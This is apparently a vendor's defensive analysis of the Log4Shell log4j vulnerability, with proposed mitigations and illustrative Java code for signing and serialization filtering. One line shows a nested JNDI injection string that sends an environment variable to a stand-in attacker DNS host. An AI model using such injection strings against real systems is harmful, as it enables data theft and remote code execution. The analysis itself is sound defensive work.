Risk analysis of Log4Shell (CVE-2021-44228) and mitigation

Log4Shell is a high-impact, exploitable bug in the Java logging framework log4j. The vulnerability can be divided into two parts: log4j2 (which allows Java programs using this component to be misled, through specially crafted loggable strings, into accessing attacker-specified URIs) and Java core (which allows unchecked execution of Java code referenced in server responses). The two parts are analyzed separately below.

log4j2

First, log4j2 introduces a special syntax (Property Substitution), ‘${prefix:name}’. When the input log contains text matching this expression, ‘name’ is evaluated as specified by ‘prefix’, and the expression is replaced with the resulting value before being written to the output log. The syntax can be nested.

Second, the following functionality was added by LOG4J2-313: when ‘prefix’ is ‘jndi’, ‘name’ is looked up through JNDI (Java Naming and Directory Interface) and the lookup result is returned (only the LDAP(S) protocol was initially supported for lookups to remote servers, but support for other protocols was not ruled out later). If ‘name’ does not contain a colon, the prefix ‘java:comp/env/’ is automatically prepended before the lookup; otherwise ‘name’ is looked up as is. So when ‘name’ is a complete URI supported by JNDI (such as the LDAP URI ldap://example.com/a), log4j2 accesses that URI directly through JNDI.
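The naming rule described above can be sketched in a few lines of Java. This is only an illustration of the rule as stated in this article, not log4j2's actual source; the class and method names (JndiNameSketch, toLookupName) are hypothetical.

```java
/** Illustrative sketch of the name rule described above; not log4j2's real code. */
final class JndiNameSketch {
    // Prefix for container-relative resources, as quoted in the article.
    static final String CONTAINER_PREFIX = "java:comp/env/";

    /** Returns the name that would be handed to JNDI for a given ${jndi:name}. */
    static String toLookupName(String name) {
        // No colon: treat the name as a container-relative resource name.
        if (name.indexOf(':') < 0) {
            return CONTAINER_PREFIX + name;
        }
        // A colon (for example a URI scheme) means the name is passed through unchanged.
        return name;
    }
}
```

Under this rule, a name such as jdbc/ds stays local to the application's naming context, while ldap://example.com/a is handed to JNDI as a full URI.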

It is important to note that log4j2 evaluates the expression ‘${prefix:name}’ wherever it appears in the input log. An attacker who can get the expression into the input log by any means can therefore manipulate log4j2’s behavior to the full extent allowed by Property Substitution. Once LOG4J2-313 introduced JNDI into Property Substitution, it became possible to make log4j2 access attacker-specified URIs, which is sufficient to construct a DoS-type attack. It also became possible to acquire parameters of the target through nested Property Substitution: for example, the expression ‘${jndi:dns://${env:USERNAME}@.attacker.com}’ causes the target to query the attacker-specified DNS server ‘attacker.com’, and the evaluated value of ‘${env:USERNAME}’ is carried out in that query.
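To make the nested evaluation concrete, here is a toy evaluator written for this article. It is a sketch under stated assumptions, not log4j2's implementation: the class name NestedSubstitutionSketch is hypothetical, lookups are plain functions supplied by the caller, and no network access takes place. Innermost expressions are resolved first, so the inner value ends up inside the name passed to the outer lookup.

```java
import java.util.Map;
import java.util.function.Function;

/** Toy model of nested ${prefix:name} substitution; not log4j2's real code. */
final class NestedSubstitutionSketch {
    private final Map<String, Function<String, String>> lookups;

    NestedSubstitutionSketch(Map<String, Function<String, String>> lookups) {
        this.lookups = lookups;
    }

    /** Replaces ${prefix:name} expressions, innermost first. */
    String substitute(String input) {
        StringBuilder out = new StringBuilder(input);
        int from = 0;
        while (true) {
            // The first "}" after 'from' closes the innermost pending expression.
            int close = out.indexOf("}", from);
            if (close < 0) {
                break;
            }
            // The nearest "${" before that "}" opens it.
            int open = out.lastIndexOf("${", close);
            String value = open < 0 ? null : evaluate(out.substring(open + 2, close));
            if (value == null) {
                from = close + 1;          // not a known expression: leave the text as is
                continue;
            }
            out.replace(open, close + 1, value);
            from = open + value.length();  // continue scanning after the inserted value
        }
        return out.toString();
    }

    /** Splits "prefix:name" and asks the lookup registered for the prefix. */
    private String evaluate(String expression) {
        int colon = expression.indexOf(':');
        if (colon < 0) {
            return null;
        }
        Function<String, String> lookup = lookups.get(expression.substring(0, colon));
        return lookup == null ? null : lookup.apply(expression.substring(colon + 1));
    }
}
```

If an ‘env’ lookup returns a user name and a stub ‘jndi’ lookup merely records the name it receives, feeding an expression of the shape shown above through substitute() makes the stub see a name that already contains the user name. That is the mechanism by which the value leaves the target.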

Java

For detailed information, see https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf

The worst part is that Java allows Java objects (serialized as binary blobs) to be stored in the directory services used by JNDI. Because Java objects are not always serializable, or not suitable for serialization, JNDI also introduces naming references:

If the Codebase can be a URI, an attacker can directly provide a malicious factory class file to remotely execute code through its constructor; otherwise, the attacker can implement return-oriented programming by providing a serialized object and then initializing it with a factory class in the classpath on the target.

Mitigation for log4j2

Property Substitution seems to have been designed originally for the configuration file. Because of a design error, however, the implementation first inserts the expression into the log at a certain processing stage and then evaluates everything uniformly, so an “expression” that originally appeared in the input log is evaluated as well. The local suggestion for improvement is therefore to limit the scope of expression evaluation to the configuration file, or at least to use options to control the evaluation of “expressions” that appear in the input log (the current Apache fix seems to be taking this route).
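The ordering problem described above can be illustrated with a small sketch. It is not log4j2's code: the class EvaluationScopeSketch and its methods are hypothetical, lookups are modelled as a fixed map keyed by ‘prefix:name’, nesting is ignored, and ‘%m’ is borrowed only as a placeholder for the message. The two methods differ solely in whether the message is inserted before or after evaluation.

```java
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Sketch of "insert then evaluate" versus "evaluate then insert"; hypothetical names. */
final class EvaluationScopeSketch {
    // Matches a single, non-nested ${prefix:name} expression.
    private static final Pattern EXPR = Pattern.compile("\\$\\{([^:}]+):([^}]*)\\}");
    private final Map<String, String> values;   // keyed by "prefix:name"

    EvaluationScopeSketch(Map<String, String> values) {
        this.values = values;
    }

    private String substitute(String text) {
        return EXPR.matcher(text).replaceAll(match -> {
            String value = values.get(match.group(1) + ":" + match.group(2));
            // Unknown expressions are left untouched.
            return Matcher.quoteReplacement(value != null ? value : match.group());
        });
    }

    /** The flawed order: the message is inserted first, so its text is evaluated too. */
    String insertThenEvaluate(String layout, String message) {
        return substitute(layout.replace("%m", message));
    }

    /** The restricted order: only the configured layout is evaluated. */
    String evaluateThenInsert(String layout, String message) {
        return substitute(layout).replace("%m", message);
    }
}
```

With the second method, an expression that arrives inside the message is written to the output literally, which is the behavior the suggested fix aims for.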

Mitigation for Java’s RCE-friendly ecosystem based on cryptographic signatures

The bigger problem is in Java itself, which, as the official documentation mentions, allows code to be loaded dynamically (even remotely) in many places without any trust restrictions. So the fundamental solution to this problem is to impose trust restrictions on Java loading remote code and serialized objects.

JAR packages have an out-of-the-box signing mechanism. There is no signature mechanism for individual Java class files, but fortunately the end of the Java class data structure is relatively easy to determine, so a digital signature can be attached directly after it, extending the format to a “Java class file with digital signature”. Such a file can still be loaded like a normal Java class file, with the digital signature simply ignored. A mechanism can then be added to prohibit the loading of Java class files that lack a trusted digital signature, with appropriate policies codified, such as prohibiting the execution of unsigned Java class files from remote sources.

Signature mechanisms can also be added to serialized objects. This includes the ability to add and remove signatures on streams generated in real time and on pre-generated blobs, as well as the ability to verify signatures (which does not actually affect the internals of the stream, and is equivalent to adding signatures to any data stream of limited length). Here too, appropriate policies can be codified, such as prohibiting the decoding of serialized objects from remote sources that lack a trusted signature.
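As a rough illustration of attaching a signature to any finite blob (class bytes or a serialized object), the following sketch appends a signature and verifies and strips it again before use. Everything here is an assumption made for illustration: the class name SignedBlobSketch, the trailer layout (payload, then signature, then a 4-byte signature length) and the choice of SHA256withRSA. In particular, the length trailer is a simplification that avoids parsing the class file to find its end.

```java
import java.nio.ByteBuffer;
import java.security.GeneralSecurityException;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.PublicKey;
import java.security.Signature;
import java.util.Arrays;

/** Sketch: append a signature to a blob and verify it before use. Hypothetical format. */
final class SignedBlobSketch {
    private static final String ALGORITHM = "SHA256withRSA";

    static KeyPair newKeyPair() {
        try {
            KeyPairGenerator generator = KeyPairGenerator.getInstance("RSA");
            generator.initialize(2048);
            return generator.generateKeyPair();
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    /** Returns payload || signature || 4-byte big-endian signature length. */
    static byte[] attach(byte[] payload, PrivateKey key) {
        try {
            Signature signer = Signature.getInstance(ALGORITHM);
            signer.initSign(key);
            signer.update(payload);
            byte[] sig = signer.sign();
            return ByteBuffer.allocate(payload.length + sig.length + 4)
                    .put(payload).put(sig).putInt(sig.length).array();
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    /** Returns the payload if the trailer verifies; throws SecurityException otherwise. */
    static byte[] verifyAndStrip(byte[] signed, PublicKey trustedKey) {
        if (signed.length < 4) {
            throw new SecurityException("missing signature trailer");
        }
        int sigLength = ByteBuffer.wrap(signed, signed.length - 4, 4).getInt();
        if (sigLength <= 0 || sigLength > signed.length - 4) {
            throw new SecurityException("malformed signature trailer");
        }
        int payloadLength = signed.length - 4 - sigLength;
        byte[] payload = Arrays.copyOfRange(signed, 0, payloadLength);
        byte[] sig = Arrays.copyOfRange(signed, payloadLength, signed.length - 4);
        try {
            Signature verifier = Signature.getInstance(ALGORITHM);
            verifier.initVerify(trustedKey);
            verifier.update(payload);
            if (!verifier.verify(sig)) {
                throw new SecurityException("no trusted signature");
            }
        } catch (GeneralSecurityException e) {
            throw new SecurityException("signature check failed", e);
        }
        return payload;
    }
}
```

A loader or deserializer enforcing the policy would call verifyAndStrip() on bytes from a remote source and refuse to continue when it throws; the returned payload is the original, unsigned blob.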

All of these functionalities can be implemented as a Java agent like log4j-jndi-be-gone to extend the functionality of the JVM; signature processing of serialized objects can be implemented through serialization filters. Since “RCE is not a bug but a feature” in Java’s enterprise application ecosystem, this approach can solve this security risk in the long run.
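For reference, the serialization filter hook mentioned above is available as java.io.ObjectInputFilter (Java 9 and later). The sketch below shows only the hook itself with a simple allow-list policy; the class name AllowListFilterSketch and the policy are assumptions for illustration, and a signature check as proposed here would have to run on the raw bytes before they reach the ObjectInputStream.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.UncheckedIOException;
import java.util.Set;

/** Sketch of an allow-list serialization filter; hypothetical policy. */
final class AllowListFilterSketch {
    static byte[] serialize(Object value) {
        try {
            ByteArrayOutputStream bytes = new ByteArrayOutputStream();
            try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
                out.writeObject(value);
            }
            return bytes.toByteArray();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    /** Deserializes data, rejecting every class that is not explicitly allowed. */
    static Object deserialize(byte[] data, Set<Class<?>> allowed) {
        ObjectInputFilter filter = info -> {
            Class<?> type = info.serialClass();
            if (type == null) {
                // Call carries only depth/reference/size information, no class.
                return ObjectInputFilter.Status.UNDECIDED;
            }
            while (type.isArray()) {
                type = type.getComponentType();   // judge arrays by their element type
            }
            return (type.isPrimitive() || allowed.contains(type))
                    ? ObjectInputFilter.Status.ALLOWED
                    : ObjectInputFilter.Status.REJECTED;
        };
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(filter);      // must be set before the first read
            return in.readObject();
        } catch (IOException e) {
            // A rejected class surfaces as java.io.InvalidClassException.
            throw new UncheckedIOException(e);
        } catch (ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }
}
```

The filter runs before the stream instantiates a class, so a rejected class never gets the chance to execute its deserialization logic.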

What should DevOps do?

To HardenedVault’s knowledge, CVE-2021-44228 does not affect some compute nodes in certain industries. These nodes are not in the Advanced Threat Protection category, but simply do:

Developers and users of enterprise apps can refer to such scenarios.

What should system-layer protection do at least?

Least privilege matters: Java applications should be prohibited from running with high privileges, so that even if an RCE occurs, the attacker still needs to obtain kernel privileges to steal valuable data. Some security mechanisms (RBAC/MAC/seccomp) can be very helpful, but their cost may not be justified for compute nodes that are not high-value.

Additional focus for advanced threat protection

CVE-2021-44228 is a revelation for institutions that are ready to consider advanced threat protection. The industry tends to believe that as long as the number of running web services is small, there is no need to consider local attacks in addition to RCE. In fact, the attack path after RCE can go through the kernel to reach lower-level computing components (such as firmware), and the “Vault Paradox” still needs to be included in the threat model for some scenarios. In addition, professional players behind advanced threats might use attacks that are widely exploited in the wild by many players (including script kiddies), such as CVE-2021-44228, as cover for attacks against high-value targets.

Should open source maintainers be blamed? Is the Open Source Foundation the only solution?

The Linux Foundation tried to solve the security problem of open source infrastructure by starting the CII (Core Infrastructure Initiative) after the famous OpenSSL vulnerability “Heartbleed”, but things did not go as well as expected; for example, the managers outnumbered the maintainers. We will face more vulnerabilities like Log4Shell/CVE-2021-44228 in the future. If the only solution is to find an institution (whether a foundation, a regulatory authority, or a big tech company), then relying on the judgment of that institution is equivalent to putting all eggs in one basket. In the context of the grassroots culture of the open source community, HardenedVault’s advice for open source projects is: the user (either an individual or a big tech company) should be responsible for whatever they “wish” (audit/hardening/etc.) the software to be.